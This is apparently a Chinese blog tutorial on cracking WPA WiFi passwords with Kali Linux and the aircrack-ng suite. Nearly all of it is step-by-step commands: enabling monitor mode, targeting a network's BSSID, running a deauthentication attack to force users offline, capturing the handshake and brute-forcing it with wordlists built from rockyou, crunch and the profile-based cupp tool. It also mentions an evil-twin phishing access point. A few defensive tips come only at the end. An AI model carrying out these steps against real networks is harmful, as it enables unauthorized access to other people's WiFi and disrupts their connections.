WiFi密码破解之Aircrack实战演示
一、使用kali Aircrack破解WiFi密码
工具:
kali系统、无线网卡、密码字典
1、插入无线网卡,打开kali终端,查看无线网卡接口
airmon-ng
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UEoZX5kY-1647410075151)(../复制IC卡/image/Snipaste_2021-12-22_11-03-51.png)]](https://img-blog.csdnimg.cn/d70b7ab4e3174724ad783c6b72eb69a4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
2、杀掉进程
airmon-ng check kill
2、开启 监听模式
airmon-ng start wlan0

3、输入iwconfig命令查看网卡信息, 一般网卡名称会更改为wlan0mon
iwconfig
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pQwWo84D-1647410075153)(../复制IC卡/image/Snipaste_2021-12-22_11-09-20.png)]](https://img-blog.csdnimg.cn/2fff0d9347db4f74b9cdde556df38bd9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
4、命令airodump-ng wlan0mon,开始扫描WiFi
airodump-ng wlan0mon
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lRBSvpwr-1647410075153)(../复制IC卡/image/Snipaste_2021-12-22_11-39-52.png)]](https://img-blog.csdnimg.cn/4810dc20bbf44f48bb5f413a20f3bf9c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
5、新建一个终端窗口,输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon
# -c 指定信道,一定要是上一步查到的要破解的wifi所用信道
# -bssid 指定bssid值,一定要是上一步查到的要破解的wifi的bssid
# -w 指定捕获的握手到保存到的文件名
例如:airodump-ng -c 11 --bssid B0:D5:9D:42:FA:A3 -w /root/Desktop/wifi_ivs_file wlan0mon
airodump-ng -c 1 --bssid 62:4E:33:09:F0:DB -w /home/geek/桌面/wifi1 wlan0mon
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1kQhtogE-1647410075153)(../复制IC卡/image/Snipaste_2021-12-22_16-18-22.png)]](https://img-blog.csdnimg.cn/f85d2e675f6d45288718504b0d4c837a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Wdpj9De7-1647410075153)(../复制IC卡/image/Snipaste_2021-12-22_16-14-02.png)]](https://img-blog.csdnimg.cn/6a3abc2c6a47449daace17fe32567a8d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
6、主动攻击,让用户掉线
# -0表示通知设备断开连接
# 10表示deauth攻击次数,小点大点都行吧
# -a指定仿造的wifi的mac地址(即bssid)
# -c表示要让认证失效的设备的mac地址,在上一步中可以看到
aireplay-ng -0 10 -a B0:D5:9D:42:FA:A3 -c C4:F0:81:02:87:5E wlan0mon
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YkskavFd-1647410075154)(../复制IC卡/image/Snipaste_2021-12-22_12-12-31.png)]](https://img-blog.csdnimg.cn/288f090eab2042afaeff4f5795d45347.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
7、当用户重连WiFi,即可获取握手包,右上角出现handshake,即成功抓到握手包
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FVC9SfTc-1647410075154)(../复制IC卡/image/Snipaste_2021-12-22_11-55-01-16401618847221.png)]](https://img-blog.csdnimg.cn/1421164b87d94bdfbd3c5428a9d7884e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
8、输入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BrfF8pFN-1647410075154)(../复制IC卡/image/微信图片_20211222163245.jpg)]](https://img-blog.csdnimg.cn/3013e4c27e8a415ab33c8327a722460d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
操作细节:
注意︰按两次Q退出,不要强制退出!
注意:如果在执行aireplay攻击后,在airodump-ng界面右上角不出现“WPA handshake: …"字样,需要选执行“airmon-ng stop wlan0”,再次执行aireplay-ng 攻击,即可出现。
重启网卡
sudo ifconfig wlan0mon down
sudo iwconfig wlan0mon mode monitor
sudo ifconfig wlan0mon up
sudo iwconfig wlan0mon
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzq2nrKi-1647410075155)(../复制IC卡/image/1640134756678.jpg)]](https://img-blog.csdnimg.cn/280c320e20ad4845a061d4da2e6edcbd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
二、kali生成字典
1、kali本地字典
cd /usr/share/wordlists
ls
sudo gunzip rockyou.txt.gz
ls
more rockyou.txt
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VhVow4c9-1647410075155)(../复制IC卡/image/Snipaste_2021-12-22_09-13-35.png)]](https://img-blog.csdnimg.cn/31ddad6d2f3b45fc9b93f34dc391d1f7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
2、使用crunch生成字典
常用参数
-b | 指定文件输出的大小,避免字典文件过大 ,比如后跟20mib |
---|
-c | 指定文件输出的行数,即包含密码的个数 ,比如8000 |
特殊字符 | 描述 |
---|
% | 代表数字 | ^ | 代表特殊符号 | @ | 代表小写字符 | , | 代表大写字符 | + | 占位符 | \ | 转义符(空格,负号) |
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C0p83ULO-1647410075155)(../复制IC卡/image/Snipaste_2021-12-22_09-24-00.png)]](https://img-blog.csdnimg.cn/9678e87be89f47ceb6eaa9632d456821.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
3、使用cupp工具生成个性化字典
下载工具:
git clone https://github.com/Mebus/cupp.git
运行cupp:
ls
cd cupp
ls
python3 cupp.py -i
-i的作用:执行文件内容或者执行命令后再进入交互模式
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Fp0Y9c57-1647410075155)(../复制IC卡/image/Snipaste_2021-12-22_09-53-55.png)]](https://img-blog.csdnimg.cn/4f7cde0ab480426ea86de47632275073.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAN-WPt-aegeWuog==,size_20,color_FFFFFF,t_70,g_se,x_16)
三、破解手法总结:
前提:具有监听功能的适配Linux系统的无线网卡;
1、扫描WiFi,攻击掉线,抓包,跑字典破解;
2、攻击掉线,伪造相同名称WiFi进行钓鱼。
防范:
1.保证连你家WIFI的人都不曾以后也不会使用WIFI万能钥匙。
? 2.定期修改密码。*增加密码强度,关闭ssid广播,出现断网情况,谨慎应对,以防被钓鱼。
? 3.**MAC地址过滤。**一般路由器后台都可以设置。
|